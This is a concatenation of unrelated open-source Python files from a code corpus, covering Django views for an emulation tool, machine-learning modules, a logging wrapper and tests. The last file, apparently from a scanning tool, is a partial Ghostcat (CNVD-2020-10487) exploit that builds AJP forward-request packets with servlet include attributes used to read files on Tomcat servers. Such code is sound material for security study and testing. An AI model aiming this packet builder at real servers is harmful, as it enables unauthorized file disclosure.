form = editConfigForm(request.POST)
if form.is_valid():
projectName = form.cleaned_data["projectName"]
project = getProjectByName(projectName)
            success = True
            if not project.set_toolchain(form.cleaned_data["toolchain"]):
                success = False
            if not project.set_emulation_config(form.cleaned_data["emulationCFlags"], int(form.cleaned_data["emulationCodeBase"], 16)):
                success = False
            if not project.set_patch_config(form.cleaned_data["patchCFlags"], int(form.cleaned_data["patchCodeBase"], 16)):
                success = False
            if success:
project.save()
return HttpResponse(project.error_msgs)
else:
form = editConfigForm()
return HttpResponse(str(form.errors))
def editGroup(request):
if request.method == 'POST':
form = editGroupForm(request.POST)
if form.is_valid():
projectName = form.cleaned_data["projectName"]
oldGroupName = form.cleaned_data["oldGroupName"]
newGroupName = form.cleaned_data["newGroupName"]
active = form.cleaned_data["active"]
project = getProjectByName(projectName)
if "actionUpdate" in request.POST:
project.group_update(oldGroupName, newGroupName)
project.group_set_active(newGroupName, active)
project.save()
if "actionDelete" in request.POST:
project.group_delete(oldGroupName)
project.save()
return HttpResponse(project.error_msgs)
else:
form = editGroupForm()
return HttpResponse(str(form.errors))
def editSegment(request):
if request.method == 'POST':
form = editSegmentForm(request.POST)
if form.is_valid():
projectName = form.cleaned_data["projectName"]
oldSegmentName = form.cleaned_data["oldSegmentName"]
oldGroupName = form.cleaned_data["oldGroupName"]
newSegmentName = form.cleaned_data["newSegmentName"]
newGroupName = form.cleaned_data["newGroupName"]
active = form.cleaned_data["active"]
addr = int(form.cleaned_data["addr"], 16)
project = getProjectByName(projectName)
if "actionUpdate" in request.POST:
project.update_segment(oldGroupName, oldSegmentName, newGroupName, newSegmentName, addr)
project.set_active_segment(newGroupName, newSegmentName, active)
project.save()
if "actionDelete" in request.POST:
project.delete_segment(oldGroupName, oldSegmentName)
project.save()
return HttpResponse(project.error_msgs)
else:
form = editSegmentForm()
return HttpResponse(str(form.errors))
def editSymbol(request):
if request.method == 'POST':
form = editSymbolForm(request.POST)
if form.is_valid():
projectName = form.cleaned_data["projectName"]
oldSymbolName = form.cleaned_data["oldSymbolName"]
oldGroupName = form.cleaned_data["oldGroupName"]
newSymbolName = form.cleaned_data["newSymbolName"]
newGroupName = form.cleaned_data["newGroupName"]
value = form.cleaned_data["value"]
project = getProjectByName(projectName)
if "actionAdd" in request.POST:
if project.add_symbol(newGroupName, newSymbolName, int(value, 16)):
project.save()
if "actionUpdate" in request.POST:
if project.update_symbol(oldGroupName, oldSymbolName, newGroupName, newSymbolName, int(value, 16)):
project.save()
if "actionDelete" in request.POST:
if project.delete_symbol(oldGroupName, oldSymbolName):
project.save()
return HttpResponse(project.error_msgs)
else:
form = editSymbolForm()
return HttpResponse(str(form.errors))
"""
Import Data
"""
def loadELF(request):
if request.method == 'POST':
form = loadELFForm(request.POST, request.FILES)
if form.is_valid():
projectName = form.cleaned_data["projectName"]
loadSegments = form.cleaned_data["loadSegments"]
loadSymbols = form.cleaned_data["loadSymbols"]
groupName = form.cleaned_data["groupName"]
groupName = "" if groupName == "Create New" else groupName
try:
fname = os.path.basename(str(request.FILES['elf']))
with open('/tmp/%s' % fname, 'wb+') as f:
for chunk in request.FILES['elf'].chunks():
f.write(chunk)
project = getProjectByName(form.cleaned_data["projectName"])
project.load_elf("/tmp/%s" % fname, load_segments=loadSegments, load_symbols=loadSymbols, group=groupName)
project.save()
return HttpResponse(project.error_msgs)
except:
return HttpResponse(traceback.format_exc())
else:
form = loadELFForm()
context = {}
return HttpResponse(str(form.errors))
def loadIdb(request):
if request.method == 'POST':
form = loadIdbForm(request.POST, request.FILES)
if form.is_valid():
projectName = form.cleaned_data["projectName"]
loadSegments = form.cleaned_data["loadSegments"]
loadFunctions = form.cleaned_data["loadFunctions"]
fname = os.path.basename(str(request.FILES['idb']))
with open('/tmp/%s' % fname, 'wb+') as f:
for chunk in request.FILES['idb'].chunks():
f.write(chunk)
try:
project = getProjectByName(form.cleaned_data["projectName"])
                project.load_idb("/tmp/%s" % fname, load_segments=loadSegments, load_functions=loadFunctions)
                project.save()
return HttpResponse(project.error_msgs)
except:
return HttpResponse(traceback.format_exc())
else:
form = loadIdbForm()
return HttpResponse(str(form.errors))
def loadSegment(request):
if request.method == 'POST':
form = loadSegmentForm(request.POST, request.FILES)
if form.is_valid():
projectName = form.cleaned_data["projectName"]
addr = int(form.cleaned_data["addr"], 16)
groupName = form.cleaned_data["groupName"]
data = request.FILES['segment'].read()
fname = os.path.basename(str(request.FILES['segment']))
segmentName = "%s_0x%x" % (fname, addr)
try:
project = getProjectByName(form.cleaned_data["projectName"])
project.add_segment(groupName, segmentName, addr, data)
project.save()
return HttpResponse(project.error_msgs)
except:
return HttpResponse(traceback.format_exc())
else:
        form = loadSegmentForm()
return HttpResponse(str(form.errors))
"""
Emulation
"""
from core import uc
import base64
class emulateForm(forms.Form):
tracepoints = forms.CharField(help_text='RWX Tracepoints', required=False)
stdin = forms.CharField(help_text='Stdin Hex Dump', required=False)
def emulate(request):
context = {"success": False}
projectName = request.GET["projectName"]
project = getProjectByName(projectName)
if not project:
return redirect("/")
projectPath = getProjectPath(projectName)
context["title"] = "%s/%s Emulate" % (request.GET["projectName"], request.GET["emulatorName"])
if request.method == 'POST':
form = emulateForm(request.POST)
if form.is_valid():
tracepoints = form.cleaned_data["tracepoints"]
if len(tracepoints) > 2:
for w in " \r\n\t":
tracepoints = tracepoints.replace(w, ",")
tracepoints = filter(lambda x: len(x) > 0, tracepoints.split(","))
tracepoints = list(map(lambda x:int(x,16), tracepoints))
else:
tracepoints = []
try:
stdin = form.cleaned_data["stdin"]
stdin = stdin.replace(" ", "").replace("\n", "").replace("\r", "")
print(stdin)
stdin = unhexlify(stdin)
except:
import traceback; traceback.print_exc()
stdin = ""
binaryPath = os.path.join(projectPath, "gen", request.GET["emulatorName"])
emulator = uc.emu(binaryPath, stdin, tracepoints, emulator_base=project.cfg["config"]["EMULATION_CODE_BASE"])
emulator.run()
#prepare results for html
results = emulator.results
from ansi2html import Ansi2HTMLConverter
conv = Ansi2HTMLConverter()
for r in results:
del r["stdout"]
r["pc_symbolized"] = project.symbolize(r["regs"]["pc"])
r["stderr"] = base64.b64encode(r["stderr"].encode("utf-8")).decode("utf-8")
r["memdif_rendered"] = base64.b64encode(r["memdif_rendered"].encode("utf-8")).decode("utf-8")
r["memdif_html"] = base64.b64encode(conv.convert(r["memdif_rendered"]).encode("utf-8")).decode("utf-8")
emulator.coverage_activity_json = json.dumps(emulator.coverage_activity)
emulator.read_activity_json = json.dumps(emulator.read_activity)
emulator.write_activity_json = json.dumps(emulator.write_activity)
#context["segments"] = sorted(project.cfg["segments"].items(), key=lambda x: x[1]["addr"])
context["symbols_json"] = json.dumps(project.get_symbols())
context["emulator"] = emulator
context["tracefile_b64"] = base64.b64encode(emulator.get_tracefile()).decode()
context["project"] = project
context["success"] = True
else:
form = emulateForm()
context["emulateForm"] = form
context["projectName"] = projectName
context["emulatorName"] = request.GET["emulatorName"]
return render_wrapper(request, 'emulate.html', context)
|
osf/models/schema_response_block.py | gaybro8777/osf.io | 628 | 11179434 | from django.db import models
from django.utils.functional import cached_property
from osf.exceptions import SchemaResponseUpdateError
from osf.models.base import BaseModel, ObjectIDMixin
from osf.utils.datetime_aware_jsonfield import DateTimeAwareJSONField
from osf.utils import sanitize
SUPPORTED_TYPE_FOR_BLOCK_TYPE = {
'short-text-input': str,
'long-text-input': str,
'single-select-input': str,
'multi-select-input': list,
'contributors-input': str,
'file-input': list,
}
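# Added note: calling the mapped type yields the "sane default" that
# set_response falls back to when no value is given, e.g. list() -> [] for
# 'file-input' and str() -> '' for 'short-text-input'.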
class SchemaResponseBlock(ObjectIDMixin, BaseModel):
# The SchemaResponse instance where this response originated
source_schema_response = models.ForeignKey(
'osf.SchemaResponse',
null=False,
related_name='updated_response_blocks'
)
# The RegistrationSchemaBlock that defines the question being answered
source_schema_block = models.ForeignKey('osf.RegistrationSchemaBlock', null=False)
# Should match source_schema_block.registration_response_key
schema_key = models.CharField(max_length=255)
response = DateTimeAwareJSONField(blank=True, null=True)
class Meta:
unique_together = ('source_schema_response', 'source_schema_block')
@classmethod
def create(cls, source_schema_response, source_schema_block, response_value=None):
new_response_block = cls(
source_schema_response=source_schema_response,
source_schema_block=source_schema_block,
schema_key=source_schema_block.registration_response_key
)
new_response_block.set_response(response_value)
return new_response_block
@cached_property
def block_type(self):
return self.source_schema_block.block_type
@cached_property
def required(self):
return self.source_schema_block.required
def set_response(self, response_value=None):
'''Set the response for the block.
Validates and sanitizes the value before assigning.
Assigns a sane default for the block type if no value or a
False-equivalent value is passed.
'''
if not response_value:
response_value = SUPPORTED_TYPE_FOR_BLOCK_TYPE[self.block_type]()
if not self.is_valid(response_value, check_required=False):
raise SchemaResponseUpdateError(
response=self.source_schema_response,
invalid_responses={self.schema_key: response_value})
self.response = _sanitize_response(response_value, self.block_type)
self.save()
def is_valid(self, response_value=None, check_required=True):
'''Confirms that a response value is valid for this block.'''
if response_value is None:
response_value = self.response
block_type = self.block_type
if not isinstance(response_value, SUPPORTED_TYPE_FOR_BLOCK_TYPE[block_type]):
return False
if not self._has_valid_selections(response_value):
return False
if check_required and self.required and not response_value:
return False
return True
def _has_valid_selections(self, response_value):
'''Validate the contents of a `*-select-input` block.'''
block_type = self.block_type
if block_type not in ['single-select-input', 'multi-select-input']:
return True
# Listify the response value
values = response_value
if block_type == 'single-select-input':
values = [values] if values else []
if not values: # validation of required fields occurs elsewhere
return True
allowed_options = self._get_select_input_options()
return all(entry in allowed_options for entry in values)
def _get_select_input_options(self):
group_key = self.source_schema_block.schema_block_group_key
allowed_values = self.source_schema_block.schema.schema_blocks.filter(
schema_block_group_key=group_key, block_type='select-input-option'
).values_list('display_text', flat=True)
return list(allowed_values)
def _sanitize_response(response_value, block_type):
if block_type == 'file-input':
return response_value # don't mess with this magic
elif block_type == 'multi-select-input':
return [sanitize.strip_html(entry) for entry in response_value]
else:
return sanitize.strip_html(response_value)
|
igibson/object_states/frozen.py | mamadbiabon/iGibson | 360 | 11179480 | import numpy as np
from igibson.object_states.object_state_base import AbsoluteObjectState, BooleanState
from igibson.object_states.temperature import Temperature
from igibson.object_states.texture_change_state_mixin import TextureChangeStateMixin
from igibson.utils.utils import transform_texture
_DEFAULT_FREEZE_TEMPERATURE = 0.0
# When an object is set as frozen, we will sample it between
# the freeze temperature and these offsets.
_FROZEN_SAMPLING_RANGE_MAX = -10.0
_FROZEN_SAMPLING_RANGE_MIN = -50.0
class Frozen(AbsoluteObjectState, BooleanState, TextureChangeStateMixin):
def __init__(self, obj, freeze_temperature=_DEFAULT_FREEZE_TEMPERATURE):
super(Frozen, self).__init__(obj)
self.freeze_temperature = freeze_temperature
@staticmethod
def get_dependencies():
return AbsoluteObjectState.get_dependencies() + [Temperature]
@staticmethod
def create_transformed_texture(diffuse_tex_filename, diffuse_tex_filename_transformed):
# 0.8 mixture with white
transform_texture(diffuse_tex_filename, diffuse_tex_filename_transformed, 0.8, (255, 255, 255))
def _set_value(self, new_value):
if new_value:
temperature = np.random.uniform(
self.freeze_temperature + _FROZEN_SAMPLING_RANGE_MIN,
self.freeze_temperature + _FROZEN_SAMPLING_RANGE_MAX,
)
return self.obj.states[Temperature].set_value(temperature)
else:
# We'll set the temperature just one degree above freezing. Hopefully the object
# isn't in a fridge.
return self.obj.states[Temperature].set_value(self.freeze_temperature + 1.0)
def _get_value(self):
return self.obj.states[Temperature].get_value() <= self.freeze_temperature
# Nothing needs to be done to save/load Frozen since it will happen due to temperature caching.
def _dump(self):
return None
def load(self, data):
return
def _update(self):
self.update_texture()
|
lra/attention_reformer.py | batuozt/transformer-ls | 177 | 11179495 | """
This file is from https://github.com/mlpen/Nystromformer
"""
import torch
import torch.nn as nn
from transformers.models.reformer.modeling_reformer import LSHSelfAttention, ReformerConfig
class LSHAttention(LSHSelfAttention):
def __init__(self, config, query, key, value):
self.num_hash = config.num_hash
reformer_config = ReformerConfig()
reformer_config.attention_head_size = config.head_dim
reformer_config.num_attention_heads = config.num_head
reformer_config.attn_layers = ["lsh"]
reformer_config.num_hashes = config.num_hash
reformer_config.is_decoder = False
reformer_config.max_position_embeddings = config.max_seq_len
reformer_config.hidden_size = config.transformer_dim
super().__init__(reformer_config)
self.query_key.weight = query.weight
self.value.weight = value.weight
def forward(self, X, mask):
return super().forward(hidden_states = X, attention_mask = mask).hidden_states
def extra_repr(self):
return f'num_hash={self.num_hash}'
|
components/iscesys/StdOEL/StdOELPy.py | vincentschut/isce2 | 1,133 | 11179496 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copyright 2010 California Institute of Technology. ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# United States Government Sponsorship acknowledged. This software is subject to
# U.S. export control laws and regulations and has been classified as 'EAR99 NLR'
# (No [Export] License Required except when exporting to an embargoed country,
# end user, or in support of a prohibited end use). By downloading this software,
# the user agrees to comply with all applicable U.S. export laws and regulations.
# The user has the responsibility to obtain export licenses, or other export
# authority as may be required before exporting this software to any 'EAR99'
# embargoed foreign country or citizen of those countries.
#
# Author: <NAME>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
from __future__ import print_function
import os
from contextlib import contextmanager
import sys
from . import StdOEL as ST
## A convenience constructor to make the writer the way applications need it
def create_writer(where, fileTag, flag, filename=None,
out=None, err=None, log=None):
"""create_writer(*args, **kwargs) takes the args/kwargs needed to
    make an Application-ready StdOEL instance.
"""
result = StdOEL()
result.createWriters(out=out, err=err, log=log)
result.configWriter(where, fileTag, flag, filename=filename)
result.init()
return result
@contextmanager
def context_writer(where, fileTag, flag, filename=None,
out=None, err=None, log=None):
"""create_writer as a context manager, see that for signature.
Usage:
>>>with context_writer as <writer>:
>>>... <suite>
>>>"""
result = create_writer(where, fileTag, flag, filename=filename,
out=out, err=err, log=log)
yield result
result.finalize()
## Any class that talks to StdOEL, needs these methods.
class _WriterInterface(object):
_stdWriter = None
def __init__(self):
self._create_writer("log" ,"", True, "insar.log")
return None
def getStdWriter(self):
return self._stdWriter
def setStdWriter(self,var):
self._stdWriter = var
stdWriter = property(getStdWriter, setStdWriter)
def _create_writer(self, where, fileTag, flag, filename=None,
out=None, err=None, log=None):
self._stdWriter = create_writer(where, fileTag, flag,
filename=filename,
out=out, err=err, log=log)
return None
def _writer_set_file_tags(self, *args):
return self.stdWriter.set_file_tags(*args)
## What does this mean?
def setState(self, obj):
obj.setStdWriter_Py(int(self.stdWriter))
pass
## The StdOEL object
class StdOEL(object):
_writer = None
_factory = None
_out = 'screen'
_err = 'screen'
_log = 'file'
_logFilename = 'log.log'
_outFilename = 'log.out'
_errFilename = 'log.err'
def finalize(self):
ST.finalize(self._writer, self._factory)
return None
def init(self):
ST.init(self._writer)
return None
def createWriters(self, out=None, err=None, log=None):
#if std type is not defined use the defaults
if out is None:
out = self._out
else:
self._out = out
if err is None:
err = self._err
else:
self._err = err
if log is None:
log = self._log
else:
self._log = log
self._writer, self._factory = ST.createWriters(out, err, log)
return None
def getWriter(self):
return self._writer
def setWriter(self, *args, **kwargs):
        raise NotImplementedError("Use createWriters and configWriter")
writer = property(getWriter, setWriter)
## A variable that is an int should be callable by int().
def __int__(self):
return self.writer
def configWriter(self, where, fileTag, flag, filename=None):
if where == 'out':
if filename is None:
filename = self._outFilename
else:
self._outFilename = filename
if where == 'err':
if filename is None:
filename = self._errFilename
else:
self._logFilename = filename
if where == 'log':
if filename is None:
filename = self._logFilename
else:
self._logFilename = filename
self.setFilename(filename, where)
self.setFileTag(fileTag, where)
self.setTimeStampFlag(flag, where)
return None
def setFilename(self,name,where):
ST.setFilename(self._writer, name, where)
return None
def setFileTag(self, name, where):
ST.setFileTag(self._writer, name, where)
return None
    ## a convenience method
def set_file_tags(self, name, *args):
for where in args:
self.setFileTag(name, where)
return self
def setTimeStampFlag(self, flag, where):
#cannot pass bool to C, so convert to int
ST.setTimeStampFlag(self._writer,
int(bool(flag)),
where)
return None
|
test_classful/test_method_dashified.py | antgel/flask-classful | 201 | 11179530 | from flask import Flask
from flask_classful import FlaskView
from nose.tools import eq_
class DashifiedDefaultView(FlaskView):
def some_route(self):
return "some route"
class DashifiedAttributeView(FlaskView):
method_dashified = True
def another_route(self):
return "another route"
class DashifiedAttributeOverrideView(FlaskView):
method_dashified = True
def yet_another_route(self):
return "yet another route"
app = Flask('test-app')
DashifiedDefaultView.register(app, method_dashified=True)
DashifiedAttributeView.register(app)
DashifiedAttributeOverrideView.register(app, method_dashified=False)
client = app.test_client()
def test_original_method_dashified():
eq_(False, DashifiedDefaultView.method_dashified)
eq_(True, DashifiedAttributeView.method_dashified)
eq_(True, DashifiedAttributeOverrideView.method_dashified)
def test_some_route():
resp = client.get('/dashified-default/some-route/')
eq_(b"some route", resp.data)
def test_another_route():
resp = client.get('/dashified-attribute/another-route/')
eq_(b"another route", resp.data)
def test_yet_another_route():
resp = client.get('/dashified-attribute-override/yet_another_route/')
eq_(b"yet another route", resp.data)
|
tools/test/topos/uk-onos.py | meodaiduoi/onos | 1,091 | 11179552 | #!/usr/bin/python
from onosnet import run
from uk import UkTopo
run( UkTopo() )
|
src/dependency_injector/resources.py | whysage/python-dependency-injector | 1,997 | 11179610 | """Resources module."""
import abc
from typing import TypeVar, Generic, Optional
T = TypeVar('T')
class Resource(Generic[T], metaclass=abc.ABCMeta):
@abc.abstractmethod
def init(self, *args, **kwargs) -> Optional[T]:
...
def shutdown(self, resource: Optional[T]) -> None:
...
class AsyncResource(Generic[T], metaclass=abc.ABCMeta):
@abc.abstractmethod
async def init(self, *args, **kwargs) -> Optional[T]:
...
async def shutdown(self, resource: Optional[T]) -> None:
...
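if __name__ == '__main__':
    # Minimal sketch (added; not part of the library): a concrete Resource
    # managing a file handle through the init/shutdown lifecycle.
    class FileResource(Resource):
        def init(self, path):
            return open(path, 'w')

        def shutdown(self, resource):
            if resource is not None:
                resource.close()

    r = FileResource()
    handle = r.init('/tmp/resource_demo.txt')
    handle.write('hello')
    r.shutdown(handle)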
|
running_modes/transfer_learning/link_invent_actions/collect_stats.py | lilleswing/Reinvent-1 | 183 | 11179626 | import random
from reinvent_chemistry import TransformationTokens
from reinvent_chemistry.library_design import BondMaker, AttachmentPoints
from reinvent_chemistry.conversions import Conversions
from typing import List, Optional
import numpy as np
import scipy.stats as sps
from reinvent_models.model_factory.generative_model_base import GenerativeModelBase
from reinvent_models.link_invent.dto import SampledSequencesDTO
from running_modes.transfer_learning.dto.collected_stats_dto import CollectedStatsDTO
from running_modes.transfer_learning.dto.sampled_stats_dto import SampledStatsDTO
from running_modes.transfer_learning.link_invent_actions.base_action import BaseAction
from running_modes.transfer_learning.logging.base_transfer_learning_logger import BaseTransferLearningLogger
class CollectStats(BaseAction):
def __init__(self, model: GenerativeModelBase, training_data: List[List[str]],
validation_data: Optional[List[List[str]]], logger: BaseTransferLearningLogger, sample_size,
initialize_data_loader_func):
BaseAction.__init__(self, logger=logger)
self._model = model
self._training_data = training_data
self._validation_data = validation_data
self._sample_size = sample_size
self._get_data_loader = initialize_data_loader_func
self._bond_maker = BondMaker()
self._attachment_points = AttachmentPoints()
self._conversions = Conversions()
self._tokens = TransformationTokens()
def run(self) -> CollectedStatsDTO:
self._logger.log_message("Collecting stats")
# collect training stats
training_data_loader = self._get_data_loader(self._get_subset(self._training_data), batch_size=128,
shuffle=False)
training_nll_list, training_sampled_stats = self._calc_stats(training_data_loader)
if self._validation_data is not None:
validation_data_loader = self._get_data_loader(self._get_subset(self._validation_data), batch_size=128,
shuffle=False)
validation_nll_list, validation_sampled_stats = self._calc_stats(validation_data_loader)
dist = [training_sampled_stats.nll_input_sampled_target, validation_sampled_stats.nll_input_sampled_target,
training_nll_list, validation_nll_list]
else:
validation_nll_list = None
validation_sampled_stats = None
dist = [training_sampled_stats.nll_input_sampled_target, training_nll_list]
stats = CollectedStatsDTO(jsd_binned=self._jsd(dist, binned=True), jsd_un_binned=self._jsd(dist, binned=False),
nll=training_nll_list, training_stats=training_sampled_stats,
validation_nll=validation_nll_list, validation_stats=validation_sampled_stats)
return stats
def _get_subset(self, data: List):
subset = list(random.sample(data, self._sample_size))
return subset
def _calc_stats(self, data_loader):
sampled_sequence_list = []
nll_list = []
for warhead_batch, linker_batch in data_loader:
sampled_sequence_list += self._model.sample(*warhead_batch)
nll_list += list(self._model.likelihood(*warhead_batch, *linker_batch).data.cpu().numpy())
sample_stats = self._get_sampled_stats(sampled_sequence_list)
return nll_list, sample_stats
def _jsd(self, dists, binned=False):
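        # Jensen-Shannon-style divergence across the given distributions:
        # truncate to a common length, optionally histogram-bin, then average
        # KL(dist || mean_dist) over all distributions (sps.entropy is KL here).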
min_size = min(len(dist) for dist in dists)
dists = [dist[:min_size] for dist in dists]
if binned:
dists = [self._bin_dist(dist) for dist in dists]
num_dists = len(dists)
avg_dist = np.sum(dists, axis=0) / num_dists
return sum((sps.entropy(dist, avg_dist) for dist in dists)) / num_dists
@staticmethod
def _bin_dist(dist, bins=1000, dist_range=(0, 100)):
bins = np.histogram(dist, bins=bins, range=dist_range, density=False)[0]
bins[bins == 0] = 1
return bins / bins.sum()
def _get_sampled_stats(self, sampled_sequence_list: List[SampledSequencesDTO]) -> SampledStatsDTO:
nll_list = []
molecule_smiles_list = []
molecule_parts_smiles_list = []
for sample in sampled_sequence_list:
nll_list.append(sample.nll)
labeled_linker = self._attachment_points.add_attachment_point_numbers(sample.output, canonicalize=False)
molecule = self._bond_maker.join_scaffolds_and_decorations(labeled_linker, sample.input)
molecule_smiles = self._conversions.mol_to_smiles(molecule) if molecule else None
molecule_is_valid = True if molecule_smiles else False
molecule_parts_smiles = sample.input + self._tokens.ATTACHMENT_SEPARATOR_TOKEN + sample.output
if molecule_is_valid:
molecule_smiles_list.append(molecule_smiles)
molecule_parts_smiles_list.append(molecule_parts_smiles)
sample_stats = SampledStatsDTO(nll_input_sampled_target=nll_list,
molecule_smiles=molecule_smiles_list,
molecule_parts_smiles=molecule_parts_smiles_list,
valid_fraction=len(molecule_smiles_list) / len(nll_list) * 100)
return sample_stats
|
tests/test_compat.py | PavanTatikonda/toasted-marshmallow | 304 | 11179671 | from toastedmarshmallow.compat import is_overridden
class Base(object):
def foo(self):
pass
class NoOverride(Base):
pass
class HasOverride(Base):
def foo(self):
pass
def test_is_overridden():
assert is_overridden(HasOverride().foo, Base.foo)
assert not is_overridden(NoOverride().foo, Base.foo)
|
graph4nlp/pytorch/modules/prediction/classification/graph_classification/max_pooling.py | cminusQAQ/graph4nlp | 1,269 | 11179685 | import torch
import torch.nn as nn
from .....data.data import from_batch
from ..base import PoolingBase
class MaxPooling(PoolingBase):
r"""Apply max pooling over the nodes in the graph.
.. math::
r^{(i)} = \max_{k=1}^{N_i}\left( x^{(i)}_k \right)
"""
def __init__(self, dim=None, use_linear_proj=False):
super(MaxPooling, self).__init__()
if use_linear_proj:
assert dim is not None, "dim should be specified when use_linear_proj is set to True"
self.linear = nn.Linear(dim, dim, bias=False)
else:
self.linear = None
def forward(self, graph, feat):
r"""Compute max pooling.
Parameters
----------
graph : GraphData
The graph data.
feat : str
The feature field name.
Returns
-------
torch.Tensor
The output feature.
"""
graph_list = from_batch(graph)
output_feat = []
for g in graph_list:
feat_tensor = g.node_features[feat]
if self.linear is not None:
feat_tensor = self.linear(feat_tensor)
output_feat.append(torch.max(feat_tensor, dim=0)[0])
output_feat = torch.stack(output_feat, 0)
return output_feat
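# Added shape sketch: the core reduction turns [N, dim] node features into a
# [dim] vector per graph, matching the max formula in the class docstring:
#   torch.max(torch.randn(5, 8), dim=0)[0].shape == (8,)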
|
notebooks/ch6/detect.py | wangyonghong/RabbitMQ-in-Depth | 111 | 11179695 | """
Facial recognition specific methods
"""
import cv2
def _boxes(filename, faces):
img = cv2.imread(filename)
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x + w, y + h), (100, 100, 255), 2)
filename = filename.split('/')[-1]
parts = filename.split('.')
new_name = '/tmp/%s-detected.%s' % (parts[0], parts[1])
cv2.imwrite(new_name, img)
return new_name
def faces(filename, ratio=1.2, neighbors=4, min_size=(10, 10)):
img = cv2.imread(filename, 0)
hc = cv2.CascadeClassifier('ch6/haarcascade_frontalface_alt.xml')
return _boxes(filename, hc.detectMultiScale(img, ratio, neighbors,
cv2.cv.CV_HAAR_SCALE_IMAGE,
min_size))
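if __name__ == '__main__':
    # Added usage sketch: 'group.jpg' is a placeholder path, not shipped with
    # this module; faces() writes an annotated copy under /tmp and returns
    # the new filename.
    print(faces('group.jpg'))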
|
thirdparty/ghostcat.py | wukong-bin/PeiQi-LandGrey-ClassHound | 489 | 11179706 | #!/usr/bin/env python
# coding: utf-8
# Reference: https://github.com/00theway/Ghostcat-CNVD-2020-10487/blob/master/ajpShooter.py
import codecs
import socket
import platform
try:
from urlparse import urlparse
except ImportError:
from urllib.request import urlparse
class AjpRequest(object):
def __init__(self, request_url, method='GET', headers=[], attributes=[]):
self.request_url = request_url
self.method = method
self.headers = headers
self.attributes = attributes
def method2code(self, method):
methods = {
'OPTIONS': 1,
'GET': 2,
'HEAD': 3,
'POST': 4,
'PUT': 5,
'DELETE': 6,
'TRACE': 7,
'PROPFIND': 8
}
code = methods.get(method, 2)
return code
def make_headers(self):
header2code = {
b'accept': b'\xA0\x01', # SC_REQ_ACCEPT
b'accept-charset': b'\xA0\x02', # SC_REQ_ACCEPT_CHARSET
b'accept-encoding': b'\xA0\x03', # SC_REQ_ACCEPT_ENCODING
b'accept-language': b'\xA0\x04', # SC_REQ_ACCEPT_LANGUAGE
b'authorization': b'\xA0\x05', # SC_REQ_AUTHORIZATION
b'connection': b'\xA0\x06', # SC_REQ_CONNECTION
b'content-type': b'\xA0\x07', # SC_REQ_CONTENT_TYPE
b'content-length': b'\xA0\x08', # SC_REQ_CONTENT_LENGTH
b'cookie': b'\xA0\x09', # SC_REQ_COOKIE
b'cookie2': b'\xA0\x0A', # SC_REQ_COOKIE2
b'host': b'\xA0\x0B', # SC_REQ_HOST
b'pragma': b'\xA0\x0C', # SC_REQ_PRAGMA
b'referer': b'\xA0\x0D', # SC_REQ_REFERER
b'user-agent': b'\xA0\x0E' # SC_REQ_USER_AGENT
}
headers_ajp = []
for (header_name, header_value) in self.headers:
code = header2code.get(header_name, b'')
if code != b'':
headers_ajp.append(code)
headers_ajp.append(self.ajp_string(header_value))
else:
headers_ajp.append(self.ajp_string(header_name))
headers_ajp.append(self.ajp_string(header_value))
return self.int2byte(len(self.headers), 2), b''.join(headers_ajp)
def make_attributes(self):
"""
org.apache.catalina.jsp_file
javax.servlet.include.servlet_path + javax.servlet.include.path_info
"""
attribute2code = {
b'remote_user': b'\x03',
b'auth_type': b'\x04',
b'query_string': b'\x05',
b'jvm_route': b'\x06',
b'ssl_cert': b'\x07',
b'ssl_cipher': b'\x08',
b'ssl_session': b'\x09',
b'req_attribute': b'\x0A', # Name (the name of the attribut follows)
b'ssl_key_size': b'\x0B'
}
attributes_ajp = []
for (name, value) in self.attributes:
code = attribute2code.get(name, b'')
if code != b'':
attributes_ajp.append(code)
if code == b'\x0A':
for v in value:
attributes_ajp.append(self.ajp_string(v))
else:
attributes_ajp.append(self.ajp_string(value))
return b''.join(attributes_ajp)
def ajp_string(self, message_bytes):
# an AJP string
        # the length of the string on two bytes + the string + one null terminator byte
message_len_int = len(message_bytes)
return self.int2byte(message_len_int, 2) + message_bytes + b'\x00'
def int2byte(self, data, byte_len=1):
if int(platform.python_version()[0]) == 3:
return data.to_bytes(byte_len, 'big')
else:
return ('%%0%dx' % (byte_len << 1) % data).decode('hex')[-byte_len:]
def make_forward_request_package(self):
"""
AJP13_FORWARD_REQUEST :=
prefix_code (byte) 0x02 = JK_AJP13_FORWARD_REQUEST
method (byte)
protocol (string)
req_uri (string)
remote_addr (string)
remote_host (string)
server_name (string)
server_port (integer)
is_ssl (boolean)
num_headers (integer)
request_headers *(req_header_name req_header_value)
attributes *(attribut_name attribute_value)
request_terminator (byte) OxFF
"""
req_ob = urlparse(self.request_url)
# JK_AJP13_FORWARD_REQUEST
prefix_code_int = 2
prefix_code_bytes = self.int2byte(prefix_code_int)
method_bytes = self.int2byte(self.method2code(self.method))
protocol_bytes = b'HTTP/1.1'
req_uri_bytes = req_ob.path.encode('utf8')
remote_addr_bytes = b'127.0.0.1'
remote_host_bytes = b'localhost'
server_name_bytes = req_ob.hostname.encode('utf8')
# SSL flag
if req_ob.scheme == 'https':
is_ssl_boolean = 1
else:
is_ssl_boolean = 0
# port
server_port_int = req_ob.port
if not server_port_int:
server_port_int = (is_ssl_boolean ^ 1) * 80 + (is_ssl_boolean ^ 0) * 443
server_port_bytes = self.int2byte(server_port_int, 2) # convert to a two bytes
is_ssl_bytes = self.int2byte(is_ssl_boolean) # convert to a one byte
self.headers.append((b'host', b'%s:%d' % (server_name_bytes, server_port_int)))
num_headers_bytes, headers_ajp_bytes = self.make_headers()
attributes_ajp_bytes = self.make_attributes()
message = []
message.append(prefix_code_bytes)
message.append(method_bytes)
message.append(self.ajp_string(protocol_bytes))
message.append(self.ajp_string(req_uri_bytes))
message.append(self.ajp_string(remote_addr_bytes))
message.append(self.ajp_string(remote_host_bytes))
message.append(self.ajp_string(server_name_bytes))
